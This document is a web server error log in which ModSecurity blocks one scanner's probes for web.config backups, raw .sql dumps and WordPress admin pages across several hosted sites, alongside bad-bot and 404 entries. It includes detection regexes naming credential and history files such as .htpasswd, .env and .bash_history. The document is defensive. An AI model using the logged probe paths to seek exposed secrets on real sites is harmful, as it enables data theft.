[Tue May 26 13:06:02.091195 2026] [security2:error] [pid 485064:tid 485230] [client 85.208.96.203:32018] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahVNYj9tlF55stOmSqEPYAAAAKk"]
[Tue May 26 13:06:02.091320 2026] [security2:error] [pid 485064:tid 485230] [client 85.208.96.203:32018] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahVNYj9tlF55stOmSqEPYAAAAKk"]
[Tue May 26 13:06:04.306979 2026] [security2:error] [pid 485064:tid 485155] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/web.config"] [unique_id "ahVNZD9tlF55stOmSqEPqgABA1o"]
[Tue May 26 13:06:04.487682 2026] [security2:error] [pid 485064:tid 485170] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/web.config.old"] [unique_id "ahVNZD9tlF55stOmSqEPsgABAWk"]
[Tue May 26 13:06:04.577981 2026] [security2:error] [pid 485064:tid 485299] [client 14.234.81.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNZD9tlF55stOmSqEPpQAAAO4"]
[Tue May 26 13:06:04.586905 2026] [security2:error] [pid 485064:tid 485236] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNZD9tlF55stOmSqEPpAAAAK8"]
[Tue May 26 13:06:04.668864 2026] [security2:error] [pid 485064:tid 485130] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/web.config.bak"] [unique_id "ahVNZD9tlF55stOmSqEPtgAAykE"]
[Tue May 26 13:06:04.850082 2026] [security2:error] [pid 485064:tid 485171] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/web.config.txt"] [unique_id "ahVNZD9tlF55stOmSqEPwAAAo2o"]
[Tue May 26 13:06:05.030817 2026] [security2:error] [pid 485064:tid 485175] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/Web.config"] [unique_id "ahVNZT9tlF55stOmSqEPygAArm4"]
[Tue May 26 13:06:05.543899 2026] [security2:error] [pid 485064:tid 485281] [client 74.249.173.207:4321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/inputs.php"] [unique_id "ahVNZT9tlF55stOmSqEP3gAAANw"]
[Tue May 26 13:06:06.534883 2026] [security2:error] [pid 485064:tid 485276] [client 74.249.173.207:4306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/ioxi-o.php"] [unique_id "ahVNZj9tlF55stOmSqEQAgAAANc"]
[Tue May 26 13:06:06.694036 2026] [security2:error] [pid 485064:tid 485198] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNZj9tlF55stOmSqEP9QAAAIk"]
[Tue May 26 13:06:07.645068 2026] [security2:error] [pid 485064:tid 485084] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/database.php"] [unique_id "ahVNZz9tlF55stOmSqEQKQAAlxM"]
[Tue May 26 13:06:08.201868 2026] [security2:error] [pid 485064:tid 485091] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/db.php"] [unique_id "ahVNaD9tlF55stOmSqEQNQAAtBo"]
[Tue May 26 13:06:08.983930 2026] [security2:error] [pid 485064:tid 485314] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNaD9tlF55stOmSqEQRQAAAP0"]
[Tue May 26 13:06:09.149068 2026] [security2:error] [pid 485064:tid 485070] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/db.sql"] [unique_id "ahVNaT9tlF55stOmSqEQVQAA5AU"]
[Tue May 26 13:06:09.331508 2026] [security2:error] [pid 485064:tid 485100] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/database.sql"] [unique_id "ahVNaT9tlF55stOmSqEQXwAApSM"]
[Tue May 26 13:06:09.513707 2026] [security2:error] [pid 485064:tid 485127] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/dump.sql"] [unique_id "ahVNaT9tlF55stOmSqEQZgAA_D4"]
[Tue May 26 13:06:09.695530 2026] [security2:error] [pid 485064:tid 485109] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/backup.sql"] [unique_id "ahVNaT9tlF55stOmSqEQawAArSw"]
[Tue May 26 13:06:09.878515 2026] [security2:error] [pid 485064:tid 485102] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/data.sql"] [unique_id "ahVNaT9tlF55stOmSqEQdAAApyU"]
[Tue May 26 13:06:10.061111 2026] [security2:error] [pid 485064:tid 485118] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/mysql.sql"] [unique_id "ahVNaj9tlF55stOmSqEQeAAA9DU"]
[Tue May 26 13:06:10.243262 2026] [security2:error] [pid 485064:tid 485087] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/schema.sql"] [unique_id "ahVNaj9tlF55stOmSqEQfgAAiRY"]
[Tue May 26 13:06:10.425239 2026] [security2:error] [pid 485064:tid 485172] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/seed.sql"] [unique_id "ahVNaj9tlF55stOmSqEQiQAA5ms"]
[Tue May 26 13:06:10.518332 2026] [security2:error] [pid 485064:tid 485206] [client 223.109.255.206:42841] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNaj9tlF55stOmSqEQigAAAJE"], referer: http://pic.sogou.com
[Tue May 26 13:06:10.606957 2026] [security2:error] [pid 485064:tid 485190] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/migration.sql"] [unique_id "ahVNaj9tlF55stOmSqEQjwAAvn0"]
[Tue May 26 13:06:10.789915 2026] [security2:error] [pid 485064:tid 485120] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/structure.sql"] [unique_id "ahVNaj9tlF55stOmSqEQkwAA8jc"]
[Tue May 26 13:06:10.972331 2026] [security2:error] [pid 485064:tid 485123] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/init.sql"] [unique_id "ahVNaj9tlF55stOmSqEQmgAA3Do"]
[Tue May 26 13:06:11.155381 2026] [security2:error] [pid 485064:tid 485089] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/create.sql"] [unique_id "ahVNaz9tlF55stOmSqEQmwAAkBg"]
[Tue May 26 13:06:11.338603 2026] [security2:error] [pid 485064:tid 485076] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/tables.sql"] [unique_id "ahVNaz9tlF55stOmSqEQoAAA0As"]
[Tue May 26 13:06:11.520584 2026] [security2:error] [pid 485064:tid 485169] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/users.sql"] [unique_id "ahVNaz9tlF55stOmSqEQqQAA6Gg"]
[Tue May 26 13:06:11.702895 2026] [security2:error] [pid 485064:tid 485110] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/import.sql"] [unique_id "ahVNaz9tlF55stOmSqEQrwAAvC0"]
[Tue May 26 13:06:11.884977 2026] [security2:error] [pid 485064:tid 485119] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/export.sql"] [unique_id "ahVNaz9tlF55stOmSqEQvwAAlzY"]
[Tue May 26 13:06:12.077410 2026] [security2:error] [pid 485064:tid 485204] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNaz9tlF55stOmSqEQrAAAAI8"]
[Tue May 26 13:06:12.637747 2026] [security2:error] [pid 485064:tid 485285] [client 74.249.173.207:4743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/function/function.php"] [unique_id "ahVNbD9tlF55stOmSqEQ1gAAAOA"]
[Tue May 26 13:06:13.744006 2026] [security2:error] [pid 485064:tid 485212] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNbT9tlF55stOmSqEQ9wAAAJc"]
[Tue May 26 13:06:14.447721 2026] [autoindex:error] [pid 485064:tid 485260] [client 103.108.58.177:19909] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:06:16.186364 2026] [security2:error] [pid 485064:tid 485248] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNbz9tlF55stOmSqERSgAAALs"]
[Tue May 26 13:06:16.629523 2026] [security2:error] [pid 485064:tid 485129] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-login.php"] [unique_id "ahVNcD9tlF55stOmSqERYAAA3kA"]
[Tue May 26 13:06:16.984827 2026] [security2:error] [pid 485064:tid 485194] [client 74.249.173.207:4336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/rip.php"] [unique_id "ahVNcD9tlF55stOmSqERbwAAAIU"]
[Tue May 26 13:06:17.361355 2026] [security2:error] [pid 485064:tid 485184] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVNcT9tlF55stOmSqERewAAi3c"]
[Tue May 26 13:06:17.497902 2026] [core:crit] [pid 485064:tid 485213] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:06:17.542118 2026] [security2:error] [pid 485064:tid 485152] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/admin-post.php"] [unique_id "ahVNcT9tlF55stOmSqERggABA1c"]
[Tue May 26 13:06:17.722494 2026] [security2:error] [pid 485064:tid 485150] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/install.php"] [unique_id "ahVNcT9tlF55stOmSqERjwAAv1U"]
[Tue May 26 13:06:17.903073 2026] [security2:error] [pid 485064:tid 485131] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVNcT9tlF55stOmSqERkAABAEI"]
[Tue May 26 13:06:18.083815 2026] [security2:error] [pid 485064:tid 485164] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/upgrade.php"] [unique_id "ahVNcj9tlF55stOmSqERkQAAx2M"]
[Tue May 26 13:06:18.264393 2026] [security2:error] [pid 485064:tid 485149] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/options.php"] [unique_id "ahVNcj9tlF55stOmSqERnAAAylQ"]
[Tue May 26 13:06:18.445261 2026] [security2:error] [pid 485064:tid 485186] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/users.php"] [unique_id "ahVNcj9tlF55stOmSqERnwAAuXk"]
[Tue May 26 13:06:18.625831 2026] [security2:error] [pid 485064:tid 485147] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/plugins.php"] [unique_id "ahVNcj9tlF55stOmSqERpAAA31I"]
[Tue May 26 13:06:18.806397 2026] [security2:error] [pid 485064:tid 485176] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/themes.php"] [unique_id "ahVNcj9tlF55stOmSqERrgAA928"]
[Tue May 26 13:06:18.986983 2026] [security2:error] [pid 485064:tid 485128] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/edit.php"] [unique_id "ahVNcj9tlF55stOmSqERtQAAyD8"]
[Tue May 26 13:06:19.143887 2026] [security2:error] [pid 485064:tid 485216] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNcj9tlF55stOmSqERpwAAAJs"]
[Tue May 26 13:06:19.167934 2026] [security2:error] [pid 485064:tid 485148] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/post-new.php"] [unique_id "ahVNcz9tlF55stOmSqERtgAA9VM"]
[Tue May 26 13:06:19.352120 2026] [security2:error] [pid 485064:tid 485141] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/upload.php"] [unique_id "ahVNcz9tlF55stOmSqERvwABAUw"]
[Tue May 26 13:06:19.532423 2026] [security2:error] [pid 485064:tid 485134] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/media-new.php"] [unique_id "ahVNcz9tlF55stOmSqERywAAtEU"]
[Tue May 26 13:06:19.713006 2026] [security2:error] [pid 485064:tid 485145] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/export.php"] [unique_id "ahVNcz9tlF55stOmSqER0AAA8FA"]
